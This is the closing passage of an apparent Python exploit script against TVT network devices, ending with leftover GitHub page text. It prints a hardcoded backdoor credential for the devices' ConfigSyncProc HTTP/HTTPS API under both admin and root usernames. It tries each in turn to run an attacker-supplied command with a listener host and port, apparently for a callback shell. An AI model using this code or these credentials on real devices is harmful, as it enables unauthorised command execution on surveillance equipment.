print "[!] Be aware that remote HTTP/HTTPS access will not work until reboot!"
TVT(rhost,rport,proto,verbose,credentials,raw_request,noexploit,headers).APIConfigClient(lhost, lport, cmd, request)
#
# HTTP/HTTPS API with hardcoded password (ConfigSyncProc)
# admin:{12213BD1-69C7-4862-843D-260500D1DA40}
else:
print "[!] Trying w/ credentials: {}".format(credentials)
if not(TVT(rhost,rport,proto,verbose,credentials,raw_request,noexploit,headers).APIConfigClient(lhost, lport, cmd, request)):
credentials = 'root:{12213BD1-69C7-4862-843D-260500D1DA40}'
print "[!] Trying w/ credentials: {}".format(credentials)
TVT(rhost,rport,proto,verbose,credentials,raw_request,noexploit,headers).APIConfigClient(lhost, lport, cmd, request)
print "[i] All done"
# [EOF]
You can’t perform that action at this time.